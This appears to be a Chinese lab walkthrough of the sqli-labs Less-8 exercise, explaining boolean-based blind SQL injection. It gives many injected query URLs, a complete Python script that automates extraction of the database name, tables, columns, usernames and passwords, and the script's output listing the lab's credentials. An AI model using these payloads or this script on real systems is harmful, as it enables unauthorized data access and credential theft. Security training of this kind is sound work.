51工具盒子摘要 {#摘要}
本文主要介绍了如何利用布尔型盲注进行 SQL 注入攻击,并使用 Python 脚本进行自动化渗透。通过逐步推断数据库名、表名、字段名等信息,最终成功获取了用户表中的用户名和密码。文章详细介绍了布尔型盲注的原理和使用方法,同时提供了 Python 脚本实现的代码,方便读者进行实践和学习。
前言 {#前言}
这关主要给大家讲解布尔型盲注知识点
各参数含义
- 布尔型盲注 length() 函数 返回字符串的长度 substr() 截取字符串 (语法:SUBSTR(str,pos,len);) ascii() 返回字符的ascii码 [将字符变为数字wei]
- 时间型 sleep() 将程序挂起一段时间n为n秒 if(expr1,expr2,expr3) 判断语句 如果第一个语句正确就执行第二个语句如果错误执行第三个语句
开启phpstudy,开启apache服务以及mysql服务
实验环节 {#实验环节}
浏览器访问Less-8 {#浏览器访问Less-8}
http://127.0.0.1/sqli-labs-master/Less-8/
判断是否存在注入 {#判断是否存在注入}
http://127.0.0.1/sqli-labs-master/Less-8/?id=1
#根据图片显示存在sql注入
判断库名长度 {#判断库名长度}
http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and (length(database()))>7 -- xz
#>7页面返回正常
http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and (length(database()))>8 -- xz
#>8页面显示异常
#所以正确库名长度就是等于8
http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and (length(database()))=8 -- xz
利用ASCII码猜解当前数据库名称 {#利用ASCII码猜解当前数据库名称}
http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and (ascii(substr(database(),1,1)))=115 -- xz
#其中database()后面的1代表通过ascii编码查看数据库第一个字母,通过结果可以看出数据库的第一位是s
http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and (ascii(substr(database(),2,1)))=101 -- xz
#2代表第二位,通过结果可以看出数据库的第二位是e
http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and (ascii(substr(database(),3,1)))=99 -- xz
#通过结果可以看出数据库的第二位是c
....以此类推综合得出数据库名是security
如何查看
首先根大于一个整数来推断具体数值,当大于某个数值出错后,输入等于那个数值页面显示正常,就可以百度搜索ascii,点击菜鸟教程查看ascii表,查看数值对应的字符
判断表名 {#判断表名}
http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)))=101 -- xz
#通过逐步推断得出,当数值等于101时,页面显示正常,由此可以得出数据表名的第一个的第一位是e
http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),2,1)))=109 -- xz
#通过逐步推断得出,当数值等于109时,页面显示正常,由此可以得出数据表名的第一个的第二位是m
........后面以此类推,根据前面的答题结果知道em开头的数据表应该就是emails
http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1)))=114 -- xz
#回显正常,第二个数据表名的第一位是r
#limit 1,1代表第二个数据表名,以此类推,2,1则是第三个
判断字段名 {#判断字段名}
http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and (ascii(substr((select column_name from information_schema.columns where table_name='emails' limit 0,1),1,1)))=105 -- xz
#回显正常,说明emails表中的列名第一位是i,以此类推
这就是sql注入中的布尔型盲注,虽然过程比较繁琐,但是结果非常精准,推荐使用
使用python脚本做题 {#使用python脚本做题}
代码如下
import requests
import string
url = 'http://192.168.199.134/sqli-labs-master/Less-8/'
i = 0
db_name_len = 0
print('[+]正在猜解数据库长度......')
while True:
payload = url + "?id=1'and length(database())=%d--+" % i
res = requests.get(payload)
print(payload)
if 'You are in...........' in res.text:
db_name_len = i
print('数据库长度为:' + str(db_name_len))
break
if i == 30:
print('error!')
break
i += 1
print("[+]正在猜解数据库名字......")
db_name = ''
for i in range(1, db_name_len + 1):
print(i)
for k in string.ascii_lowercase:
print(k)
payload = url + "?id=1'and substr(database(),%d,1)='%s'--+" % (i, k)
res = requests.get(payload)
print(payload)
if 'You are in...........' in res.text:
db_name += k
print(db_name)
break
print("数据库为: %s" % db_name)
猜解几张表
print("[+]正在猜解表的数量......")
tab_num = 0
while True:
payload = url + "?id=1'and (select count(table_name) from information_schema.tables where table_schema='security')=%d--+" % tab_num
res = requests.get(payload)
if 'You are in...........' in res.text:
print("%s数据库共有" % db_name + str(tab_num) + "张表")
break
else:
tab_num += 1
print("[+]开始猜解表名......")
for i in range(1, tab_num + 1):
tab_len = 0
while True:
payload = url + "?id=1'and (select length(table_name) from information_schema.tables where table_schema='security' limit %d,1)=%d--+" % (
i - 1, tab_len)
res = requests.get(payload)
print(payload)
if 'You are in...........' in res.text:
print ('第%d张表长度为:'%i+str(tab_len))
break
if tab_len == 30:
print('error!')
break
tab_len += 1
tab_name = ''
for j in range(1, tab_len + 1):
for m in string.ascii_lowercase:
payload = url + "?id=1'and substr((select table_name from information_schema.tables where table_schema='security' limit %d,1),%d,1)='%s'--+" % (
i - 1, j, m)
res = requests.get(payload)
if 'You are in...........' in res.text:
tab_name += m
print (tab_name)
print("[-]第%d张表名为: %s" % (i, tab_name))
尝试猜解表下字段......
dump_num = 0
while True:
payload = url + "?id=1'and (select count(column_name) from information_schema.columns where table_name='%s')=%d--+" % (
tab_name, dump_num)
res = requests.get(payload)
if 'You are in...........' in res.text:
print("%s表下有%d个字段" % (tab_name, dump_num))
break
dump_num += 1
for a in range(1, dump_num + 1):
dump_len = 0
while True:
payload = url + "?id=1'and (select length(column_name) from information_schema.columns where table_name='%s' limit %d,1)=%d--+" % (
tab_name, a - 1, dump_len)
res = requests.get(payload)
# print(payload)
if 'You are in...........' in res.text:
# print("第%d个字段长度为%d"%(a,dump_len))
break
dump_len += 1
if dump_len == 30:
print("error!!")
break
dump_name = ''
for i in range(1, dump_len + 1):
for j in (string.ascii_lowercase + '_-'):
payload = url + "?id=1'and substr((select column_name from information_schema.columns where table_name='%s' limit %d,1),%d,1)='%s'--+" % (
tab_name, a - 1, i, j)
res = requests.get(payload)
if 'You are in...........' in res.text:
dump_name += j
# print(dump_name)
break
print(dump_name)
print("[+]开始猜解users表下的username......")
usn_num = 0
char = "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890_-"
while True:
payload = url + "?id=1'and (select count(username) from security.users)=%d--+" % usn_num
res = requests.get(payload)
if "You are in" in res.text:
print(usn_num)#13
break
usn_num += 1
for i in range(1, usn_num + 1):
usn_len = 0
while True:
payload = url + "?id=1'and (select length(username) from security.users limit %d,1)=%d--+" % (i - 1, usn_len)
res = requests.get(payload)
if "You are in" in res.text:
print("第%d的长度为%d"%(i,usn_len))
break
usn_len += 1
usr_name = ''
for k in range(1, usn_len + 1):
for m in char:
payload = url + "?id=1'and substr((select username from security.users limit %d,1),%d,1)='%s'--+" % (
i - 1, k, m)
res = requests.get(payload)
if "You are in" in res.text:
usr_name += m
break
print(usr_name)
`print("[+]开始猜解users表下的password......")
usn_num = 0
char = "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890_-@!"
while True:
payload = url + "?id=1'and (select count(password) from security.users)=%d--+" % usn_num
res = requests.get(payload)
if "You are in" in res.text:
print(usn_num)#13
break
usn_num += 1
for i in range(1, usn_num + 1):
usn_len = 0
while True:
payload = url + "?id=1'and (select length(password) from security.users limit %d,1)=%d--+" % (i - 1, usn_len)
res = requests.get(payload)
if "You are in" in res.text:
print("第%d的长度为%d"%(i,usn_len))
break
usn_len += 1
usr_name = ''
for k in range(1, usn_len + 1):
for m in char:
payload = url + "?id=1'and substr((select password from security.users limit %d,1),%d,1)='%s'--+" % (
i - 1, k, m)
res = requests.get(payload)
if "You are in" in res.text:
usr_name += m
break
print(usr_name)
`
解题结果
D:\pythonProject\my_pythonProject\Scripts\python.exe D:\pythonProject\main.py
[+]正在猜解数据库长度......
数据库长度为:8
[+]正在猜解数据库名字......
数据库为: security
[+]正在猜解表的数量......
security数据库共有4张表
[+]开始猜解表名......
[-]第1张表名为: emails
emails表下有2个字段
id
email_id
[-]第2张表名为: referers
referers表下有3个字段
id
referer
ip_address
[-]第3张表名为: uagents
uagents表下有4个字段
id
uagent
ip_address
username
[-]第4张表名为: users
users表下有6个字段
user
current_connections
total_connections
id
username
password
[+]开始猜解users表下的username......
dumb
angelina
dummy
secure
stupid
superman
batman
admin
admin1
admin2
admin3
dhakkan
admin4
[+]开始猜解users表下的password......
dumb
i-kill-you
p@ssword
crappy
stupidity
genious
mob!le
admin
admin1
admin2
admin3
dumbo
admin4
`进程已结束,退出代码0
`
